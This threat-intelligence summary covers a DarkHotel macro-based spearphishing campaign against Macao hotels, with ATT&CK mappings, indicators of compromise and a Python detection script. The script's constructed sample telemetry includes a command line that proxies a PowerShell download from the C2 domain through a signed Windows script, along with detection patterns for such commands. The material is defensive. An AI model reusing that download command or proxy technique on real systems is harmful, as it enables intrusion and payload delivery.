Threat researchers describe a first-stage spearphishing campaign targeting luxury hotels in Macao that used a password-protected Excel file with macros to drop and execute further payloads via scheduled tasks and PowerShell. The operation, attributed to DarkHotel, employed a hard-coded C2 domain impersonating a government site (fsm-gov.com) and targeted hotels such as Grand Coloane Resort and Wynn Palace. #DarkHotel #Macao
Keypoints
- The attack began with a spearphishing email to hotel management staff, containing an Excel attachment named 信息.xls (information.xls).
- The Excel file contains macros that trigger during opening and perform multiple stages of credential and data handling, including data exfiltration.
- Macros use a Living Off the Land technique (PowerShell) to communicate with the C2 server and drop additional payloads.
- One macro approach involves creating a scheduled task via a COM object to run scripts and exfiltrate data while attempting to hide traces (e.g., deleting created files).
- The C2 infrastructure includes a hard-coded domain, FSM-GOV.com, impersonating a Micronesia government site, with the IP 23.111.184.119 hosting related content.
- Hotels targeted include Grand Coloane Resort and Wynn Palace, with motives tied to potential espionage and event-related reconnaissance.
- Macao authorities issued alerts about the phishing domain and the campaign, linking it to suspected DarkHotel activity and cautioning the public.
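The keypoints above describe a chain that is easy to write detection logic for: an Office process spawning a script host, a scheduled task registered from inside the macro, PowerShell launched with download or encoded-command arguments, and resolution of the hard-coded C2 domain. The script below is an added example, not code from the report or from DarkHotel's tooling. It runs the checks over constructed sample telemetry; the event field names are loosely modelled on Sysmon Event ID 1 (process creation), Sysmon Event ID 22 (DNS query) and Security Event 4698 (scheduled task created), and the host names, task XML and command lines are made up for the example. The one caveat it encodes is that a task created through the Task Scheduler COM object never produces a schtasks.exe child process, so the registration event is the only place that stage is visible.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, List

# Office applications whose child processes should never be script hosts.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe", "schtasks.exe"}

# Indicators taken from the report; everything else in this file is constructed.
IOC_DOMAINS = {"fsm-gov.com"}
IOC_IPS = {"23.111.184.119"}
IOC_PATH_FRAGMENTS = {r"\appdata\roaming\microsoft\windows\prcjobs.vbs",
                      r"\system32\syncappvpublishingserver.vbs"}

SUSPICIOUS_PS_ARGS = re.compile(
    r"(?i)(-e(nc|ncodedcommand)?\s|downloadstring|invoke-webrequest|iwr\s|"
    r"-w(indowstyle)?\s+hidden)")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _mentions_c2(text: str) -> bool:
    t = text.lower()
    return any(d in t for d in IOC_DOMAINS) or any(ip in t for ip in IOC_IPS)


def _mentions_path(text: str) -> bool:
    t = text.lower()
    return any(p in t for p in IOC_PATH_FRAGMENTS)


def classify(event: Dict[str, str]) -> List[str]:
    """Return the detection labels that fire on one normalised event."""
    hits: List[str] = []
    kind = event.get("type")
    if kind == "process":
        parent = _basename(event.get("parent_image", ""))
        image = _basename(event.get("image", ""))
        cmd = event.get("command_line", "")
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            hits.append("office_spawns_script_host")
        if "syncappvpublishingserver.vbs" in cmd.lower():
            hits.append("lolbin_syncappvpublishingserver")
        if image in {"powershell.exe", "pwsh.exe"} and SUSPICIOUS_PS_ARGS.search(cmd):
            hits.append("suspicious_powershell_args")
        if _mentions_c2(cmd):
            hits.append("ioc_c2_in_command_line")
        if _mentions_path(cmd):
            hits.append("ioc_known_script_path")
    elif kind == "task_created":
        # A task registered via the Task Scheduler COM object spawns no schtasks.exe,
        # so Security 4698 (or TaskScheduler Operational 106) is the only trace.
        content = event.get("task_content", "").lower()
        if any(h in content for h in SCRIPT_HOSTS) or _mentions_path(content):
            hits.append("scheduled_task_runs_script")
    elif kind == "dns":
        if event.get("query", "").lower().rstrip(".") in IOC_DOMAINS:
            hits.append("ioc_c2_dns")
    elif kind == "network":
        if event.get("dest_ip") in IOC_IPS:
            hits.append("ioc_c2_ip")
    return hits


def triage(events: Iterable[Dict[str, str]]) -> Dict[str, str]:
    """Correlate per host: the chain is Office -> script host plus a task
    registration; C2 is any indicator hit on the wire or in a command line."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev.get("host", "?")].update(classify(ev))
    verdicts: Dict[str, str] = {}
    for host, hits in per_host.items():
        chain = {"office_spawns_script_host", "scheduled_task_runs_script"} <= hits
        c2 = bool(hits & {"ioc_c2_dns", "ioc_c2_ip", "ioc_c2_in_command_line"})
        verdicts[host] = ("macro_chain_with_c2" if chain and c2 else
                          "partial_match" if chain or c2 else
                          "review" if hits else "clean")
    return verdicts


# Constructed sample telemetry (hosts, task XML and command lines are invented).
SAMPLE_EVENTS = [
    {"host": "HOTEL-FO-01", "type": "process",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'wscript.exe //B "C:\Users\USER\AppData\Roaming\Microsoft\Windows\prcjobs.vbs"'},
    {"host": "HOTEL-FO-01", "type": "task_created",
     "task_content": r'<Exec><Command>wscript.exe</Command><Arguments>//B "C:\Users\USER\AppData\Roaming\Microsoft\Windows\prcjobs.vbs"</Arguments></Exec>'},
    {"host": "HOTEL-FO-01", "type": "process",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cscript.exe",
     "command_line": r'''cscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n;(New-Object Net.WebClient).DownloadString('https://fsm-gov.com/')"'''},
    {"host": "HOTEL-FO-01", "type": "process",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoP -W Hidden -Enc <base64-omitted>"},
    {"host": "HOTEL-FO-01", "type": "dns", "query": "fsm-gov.com"},
    {"host": "HOTEL-FO-02", "type": "process",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["host"], ev["type"], classify(ev))
    print(triage(SAMPLE_EVENTS))
```

The per-event labels are deliberately narrow (each one is cheap and low-noise on its own) and the verdict comes from correlating them per host, which is what keeps the benign PowerShell launch on HOTEL-FO-02 from paging anyone. In a real deployment the IOC sets would be loaded from a feed rather than hard-coded, and the 4698 task content would be parsed as XML instead of substring-matched.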
MITRE Techniques
- [T1566.001] Spearphishing Attachment: initial access was an email to hotel management staff carrying the malicious workbook ('The attack began with a spearphishing email to hotel management staff, containing an Excel attachment named 信息.xls (information.xls).')
- [T1204.002] Malicious File: the victim has to open the workbook and allow macros before anything runs ('The Excel file contains macros that trigger during opening and perform multiple stages of credential and data handling, including data exfiltration.')
- [T1059.005] Visual Basic: the embedded VBA macros act as the first-stage loader for the later stages ('The Excel file contains macros that trigger during opening and perform multiple stages of credential and data handling, including data exfiltration.')
- [T1070.004] File Deletion: the macro removes the files it drops to reduce forensic traces ('e.g., deleting created files')
- [T1106] Native API: the scheduled task is registered through a COM object from inside the macro rather than by launching schtasks.exe, so no separate task-creation process appears in process telemetry ('One macro approach involves creating a scheduled task via a COM object to run scripts and exfiltrate data.')
- [T1053.005] Scheduled Task: the COM-created task runs the dropped script and the exfiltration stage ('One macro approach involves creating a scheduled task via a COM object to run scripts and exfiltrate data.')
- [T1064] Scripting: deprecated ATT&CK ID retained from the original mapping; the behaviour is covered today by T1059.005 (VBA) and T1059.001 (PowerShell) ('The Excel file contains macros that trigger during opening and perform multiple stages of credential and data handling, including data exfiltration.')
- [T1059.001] PowerShell: the macros call PowerShell, a tool already present on the host, to reach the C2 and fetch further payloads ('Macros use a Living Off the Land technique (PowerShell) to communicate with the C2 server and drop additional payloads.')
- [T1071] Application Layer Protocol: C2 traffic to fsm-gov.com uses a standard application-layer protocol; the summary does not state which one ('Macros use a Living Off the Land technique (PowerShell) to communicate with the C2 server and drop additional payloads.')
Indicators of Compromise
- [IP] 23.111.184.119: C2 infrastructure used for system information exfiltration
- [Domain] fsm-gov.com: C2 domain used for command and control
- [Domain] fsmgov.org: legitimate Federated States of Micronesia government domain that the C2 domain impersonates; listed for context only, not an indicator
- [Hash] a251ac8cec78ac4f39fc5536996bed66c3436f8c16d377922187ea61722c71f8: first Excel sample payload
- [Hash] 163c386598e1826b0d81a93d2ca0dc615265473b66d4521c359991828b725c14: second Excel sample payload
- [File Name] 信息.xls: initial phishing attachment name
- [File Path] C:\Users\USER\AppData\Roaming\Microsoft\Windows\prcjobs.vbs: dropped script location (USER is the victim's profile name)
- [File Path] System32\SyncAppvPublishingServer.vbs: Microsoft-signed script (a known LOLBin) that launches PowerShell with the arguments it is given, abused so the PowerShell stage runs under a trusted signed script instead of a direct powershell.exe launch from the macro